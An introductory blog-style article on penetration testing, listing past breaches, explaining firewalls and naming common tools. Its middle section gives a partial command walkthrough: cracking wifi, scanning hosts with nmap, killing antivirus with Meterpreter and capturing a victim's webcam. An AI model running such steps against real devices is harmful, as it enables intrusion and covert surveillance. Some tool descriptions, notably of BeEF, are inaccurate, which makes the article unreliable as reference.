It is a way of testing how vulnerable as system and it’s data is to attacks from external sources. An accronym used generally for penetration testing is Pen Testing. It is a process in which companies hire ethical hackers to test and find vulnerabilities in their own systems. The cost of hiring such penetration testers vary greatly because there is no fixed meaurement of the difficulty of this job.
Major Cyber Security Attacts in History.
- Adobe 2013 : Major hack affected adobe IT infrastructure and personal information of around 2.9 million accounts was stolen.
- Sony 2011 : Attack on the PlayStation Network and personal data of 77 million users was leaked.
- South Korea 2014 : 100 million credit card data was stolen over the course of several years and around 20 million bank accounts have been hacked.
- Target 2013 : Ironically Target was the target of a cyber security attack in which data of 110 million customers were stolen.
- Alteryx : A mistake by the company left a database of sensitive information exposed unsecured online in an AWS S3 storage cache.
What is a Firewall?
Firewall is the thing standing between as device and external systems trying to communicate with it. Now firewall is not a grumpy uncle keeping kids out of the orchard. It is more like a security guard who blocks unwanted connections but facilitates required connections.
Now let us see a simple example of penetrating into a system using it’s wifi using BackTrack and aircrack-ng.
please note that this is just an example of how easy it is to penetrate into the system and get the camera feed not a fully explained tutorial.
- Crack the wifi
- bt > airmon-ng start wlan0
- bt > airodump-ng mon0
- Enumerate with Netdiscover
- bt > netdiscover -r 192.168.1.0/24
- Scan the Network
- bt > nmap -sT 192.168.1.0/24
- Discover the Operating Systems
- bt > xprobe2 192.168.1.103
- bt > xprobe2 192.168.1.107
- Hack One of the Systems
- Turn on the Webcam
- meterpreter > run killav.rb
- meterpreter > webcam_snap
- You should be getting the camera feed of the victim device.
Popular tools used in penetration testing
- Network Mapper(NMAP) : Free and opensource tool for network discovery(It allows a computer or a device to be visible to other systems) and security auditing(checking how weel a system athers to an established criteria).
- Metasploit : Metasploit is basically a hacking tool that can be very dangerous in wrong hands. It is used for carrying out various attacks from sending malicious code to exploiting system weakness while testing.
- BeEF : Solid command-line tool for monitoring the network’s ‘open door’ – the browser – for any unusual behaviour.
- Wireshark : A tool for analyzing network protocols.
- John the Ripper : Command-line tool for cracking password and testing how secure user password is.
Best penetration testing companies
- Red Security and their Red Team
- Secureworks Penetration Testing
- FireEye Penetration Testing
- Rapid7 Penetration Testing
- VeraCode Penetration Testing